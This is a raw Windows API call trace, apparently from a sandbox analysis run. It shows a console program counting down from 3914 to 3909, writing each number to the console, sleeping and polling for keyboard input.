[0171.235] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083914") returned 8
[0171.235] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0171.235] __iob_func () returned 0x757a2900
[0171.235] _fileno (_File=0x757a2920) returned 1
[0171.235] _errno () returned 0x5507d8
[0171.235] _get_osfhandle (_FileHandle=1) returned 0x4c
[0171.235] _errno () returned 0x5507d8
[0171.235] GetFileType (hFile=0x4c) returned 0x2
[0171.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0171.235] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0171.235] lstrlenW (lpString="\x08\x08\x08\x083914") returned 8
[0171.235] GetConsoleOutputCP () returned 0x1b5
[0171.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083914", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0171.235] GetConsoleOutputCP () returned 0x1b5
[0171.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083914", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083914", lpUsedDefaultChar=0x0) returned 8
[0171.235] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0171.236] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0171.236] Sleep (dwMilliseconds=0x64)
[0171.344] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.344] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.344] Sleep (dwMilliseconds=0x64)
[0171.453] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.453] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.453] Sleep (dwMilliseconds=0x64)
[0171.562] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.562] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.562] Sleep (dwMilliseconds=0x64)
[0171.672] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.672] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.672] Sleep (dwMilliseconds=0x64)
[0171.787] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.788] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.788] Sleep (dwMilliseconds=0x64)
[0171.890] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.890] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.890] Sleep (dwMilliseconds=0x64)
[0171.999] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0171.999] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0171.999] Sleep (dwMilliseconds=0x64)
[0172.108] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.108] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0172.108] Sleep (dwMilliseconds=0x64)
[0172.217] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.218] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6007
[0172.218] Sleep (dwMilliseconds=0x64)
[0172.327] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.327] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.327] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083913") returned 8
[0172.327] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0172.327] __iob_func () returned 0x757a2900
[0172.327] _fileno (_File=0x757a2920) returned 1
[0172.327] _errno () returned 0x5507d8
[0172.327] _get_osfhandle (_FileHandle=1) returned 0x4c
[0172.327] _errno () returned 0x5507d8
[0172.327] GetFileType (hFile=0x4c) returned 0x2
[0172.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0172.327] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0172.328] lstrlenW (lpString="\x08\x08\x08\x083913") returned 8
[0172.328] GetConsoleOutputCP () returned 0x1b5
[0172.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083913", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0172.328] GetConsoleOutputCP () returned 0x1b5
[0172.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083913", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083913", lpUsedDefaultChar=0x0) returned 8
[0172.328] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0172.328] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0172.328] Sleep (dwMilliseconds=0x64)
[0172.436] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.436] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.436] Sleep (dwMilliseconds=0x64)
[0172.545] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.545] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.545] Sleep (dwMilliseconds=0x64)
[0172.654] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.655] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.655] Sleep (dwMilliseconds=0x64)
[0172.763] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.764] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.764] Sleep (dwMilliseconds=0x64)
[0172.873] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.873] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.873] Sleep (dwMilliseconds=0x64)
[0172.989] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0172.989] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0172.989] Sleep (dwMilliseconds=0x64)
[0173.091] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.091] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0173.091] Sleep (dwMilliseconds=0x64)
[0173.200] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.200] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6008
[0173.200] Sleep (dwMilliseconds=0x64)
[0173.309] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.310] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.310] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083912") returned 8
[0173.310] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0173.310] __iob_func () returned 0x757a2900
[0173.310] _fileno (_File=0x757a2920) returned 1
[0173.310] _errno () returned 0x5507d8
[0173.310] _get_osfhandle (_FileHandle=1) returned 0x4c
[0173.310] _errno () returned 0x5507d8
[0173.310] GetFileType (hFile=0x4c) returned 0x2
[0173.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0173.310] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0173.310] lstrlenW (lpString="\x08\x08\x08\x083912") returned 8
[0173.310] GetConsoleOutputCP () returned 0x1b5
[0173.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083912", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0173.310] GetConsoleOutputCP () returned 0x1b5
[0173.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083912", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083912", lpUsedDefaultChar=0x0) returned 8
[0173.310] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0173.310] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0173.310] Sleep (dwMilliseconds=0x64)
[0173.419] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.419] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.419] Sleep (dwMilliseconds=0x64)
[0173.528] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.529] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.529] Sleep (dwMilliseconds=0x64)
[0173.637] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.637] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.637] Sleep (dwMilliseconds=0x64)
[0173.746] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.746] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.746] Sleep (dwMilliseconds=0x64)
[0173.855] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.856] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.856] Sleep (dwMilliseconds=0x64)
[0173.967] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0173.967] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0173.967] Sleep (dwMilliseconds=0x64)
[0174.074] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.074] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0174.074] Sleep (dwMilliseconds=0x64)
[0174.183] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.183] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6009
[0174.183] Sleep (dwMilliseconds=0x64)
[0174.292] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.292] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.292] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083911") returned 8
[0174.292] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0174.293] __iob_func () returned 0x757a2900
[0174.293] _fileno (_File=0x757a2920) returned 1
[0174.293] _errno () returned 0x5507d8
[0174.293] _get_osfhandle (_FileHandle=1) returned 0x4c
[0174.293] _errno () returned 0x5507d8
[0174.293] GetFileType (hFile=0x4c) returned 0x2
[0174.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0174.293] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0174.293] lstrlenW (lpString="\x08\x08\x08\x083911") returned 8
[0174.293] GetConsoleOutputCP () returned 0x1b5
[0174.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083911", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0174.293] GetConsoleOutputCP () returned 0x1b5
[0174.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083911", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083911", lpUsedDefaultChar=0x0) returned 8
[0174.293] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0174.294] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0174.294] Sleep (dwMilliseconds=0x64)
[0174.402] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.402] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.402] Sleep (dwMilliseconds=0x64)
[0174.511] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.511] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.511] Sleep (dwMilliseconds=0x64)
[0174.620] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.620] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.620] Sleep (dwMilliseconds=0x64)
[0174.729] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.730] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.730] Sleep (dwMilliseconds=0x64)
[0174.838] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.839] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.839] Sleep (dwMilliseconds=0x64)
[0174.947] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0174.948] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0174.948] Sleep (dwMilliseconds=0x64)
[0175.057] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.057] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0175.057] Sleep (dwMilliseconds=0x64)
[0175.166] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.166] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600a
[0175.166] Sleep (dwMilliseconds=0x64)
[0175.275] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.275] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.275] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083910") returned 8
[0175.275] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0175.276] __iob_func () returned 0x757a2900
[0175.276] _fileno (_File=0x757a2920) returned 1
[0175.276] _errno () returned 0x5507d8
[0175.276] _get_osfhandle (_FileHandle=1) returned 0x4c
[0175.276] _errno () returned 0x5507d8
[0175.276] GetFileType (hFile=0x4c) returned 0x2
[0175.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0175.276] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0175.276] lstrlenW (lpString="\x08\x08\x08\x083910") returned 8
[0175.276] GetConsoleOutputCP () returned 0x1b5
[0175.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083910", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0175.276] GetConsoleOutputCP () returned 0x1b5
[0175.276] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083910", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083910", lpUsedDefaultChar=0x0) returned 8
[0175.276] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0175.276] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0175.277] Sleep (dwMilliseconds=0x64)
[0175.384] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.385] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.385] Sleep (dwMilliseconds=0x64)
[0175.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.494] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.494] Sleep (dwMilliseconds=0x64)
[0175.603] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.603] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.603] Sleep (dwMilliseconds=0x64)
[0175.712] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.712] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.712] Sleep (dwMilliseconds=0x64)
[0175.821] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.821] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.821] Sleep (dwMilliseconds=0x64)
[0175.930] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0175.931] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0175.931] Sleep (dwMilliseconds=0x64)
[0176.039] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.040] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0176.040] Sleep (dwMilliseconds=0x64)
[0176.149] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.149] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600b
[0176.149] Sleep (dwMilliseconds=0x64)
[0176.258] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.258] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.258] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083909") returned 8
[0176.258] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0176.258] __iob_func () returned 0x757a2900
[0176.258] _fileno (_File=0x757a2920) returned 1
[0176.258] _errno () returned 0x5507d8
[0176.258] _get_osfhandle (_FileHandle=1) returned 0x4c
[0176.258] _errno () returned 0x5507d8
[0176.258] GetFileType (hFile=0x4c) returned 0x2
[0176.259] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0176.259] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0176.259] lstrlenW (lpString="\x08\x08\x08\x083909") returned 8
[0176.259] GetConsoleOutputCP () returned 0x1b5
[0176.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083909", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0176.259] GetConsoleOutputCP () returned 0x1b5
[0176.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083909", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083909", lpUsedDefaultChar=0x0) returned 8
[0176.259] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0176.259] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0176.259] Sleep (dwMilliseconds=0x64)
[0176.367] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.367] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.367] Sleep (dwMilliseconds=0x64)
[0176.476] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.476] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.476] Sleep (dwMilliseconds=0x64)
[0176.585] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.586] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.586] Sleep (dwMilliseconds=0x64)
[0176.695] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0176.695] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd600c
[0176.695] Sleep (dwMilliseconds=0x64)
[0176.804] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
